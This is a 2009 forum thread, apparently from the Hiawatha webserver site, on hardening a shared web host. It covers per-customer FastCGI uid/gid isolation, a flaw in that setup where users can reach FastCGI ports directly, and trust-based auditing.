Forum

Webserver security

William
11 July 2009, 11:55
I was wondering what thoughts you had on hardening a webserver such as fastcgi process uid and gid and file permissions? Perhaps you could write a page about this kind of security considerations.

My thoughts on securing my webservers: I've got a separate uid and gid for each customer and the fastcgi process for that customer runs with their respective uid and gid. The customer's WebsiteRoot and files is owned by the customer's uid and the www gid. This way they can not see or write each other's files. A security vulnerability will be isolated to that specific customer and the others will not be affected. The webserver can access the group readable files since they're group owned by the webserver. Each customer has their own php.ini with php sessions and upload directory owned by that uid and gid to prevent session stealing all that. What do you think of this setup?

The customers WebsiteRoot is in a directory below their home directory and only contains files that are needed to be accessed, such as index.php and css and images, by the browsers. Then index.php accesses any needed files, such as libraries, outside of the WebsiteRoot by going up directories "../" this way only what's needed is exposed to the internet.

I think this is a pretty secure setup. But I'm sure you have some good ideas too on how to improve it, or on how it could be flawed.
Hugo Leisink
11 July 2009, 14:00
I don't know what kind of FastCGI process we're talking about here, but if it's PHP, the problem is that it will take quite some memory to start a seperate FastCGI process for each user. How many users does your webserver have? What you can do is use your FastCGI setup for the high traffic websites and (assuming you use Hiawatha) use the cgi-wrapper for the low traffic websites. See the cgi-wrapper HOWTO for more information about the cgi-wrapper.

The flaw in your FastCGI setup is that any user can access any FastCGI application directly. Of course, this is harder than simply reading a file, but it is possible. If we're talking about PHP as the FastCGI process, any user can write a script, connect to the right local port and instruct PHP to execute his/her script. This way, you cannot only read other user's files, but also run programs as that other user. Which is even worse. This can be solved by using the cgi-wrapper for every website, but this will make things slower (PHP via FastCGI is about 15 times faster that via normal CGI).

In my opinion, you're overdoing. Good security doesn't come with some technical solution. Security comes with trust and good auditing methods. At what level do you trust your users? Divide all users according to their trust level. Give each trust level its own server. Give extra attention (auditing) to the lower trust level servers. If you don't trust a user at all, don't give access. Paying customer or no paying customer. And of course, let every user sign a contract which says that hacking or even sniffing around is NOT allowed. Any kind of abuse will result in account removal. That in combination with just a single PHP FastCGI process which runs every script of every user under the same userid and some good auditing methods is secure enough. But that's just my opinion.

About your website directory layout, that sounds good. I also build my web applications that way. Still, this setup gives you no security if your website allowes visitors to read any file on disk via, for example, a parameter in the URL. Security is like a chain. It's as strong as the weakest link. In my opinion, the weakest link in web security is still the website, not the webserver, not the database, not the OS.
This topic has been closed.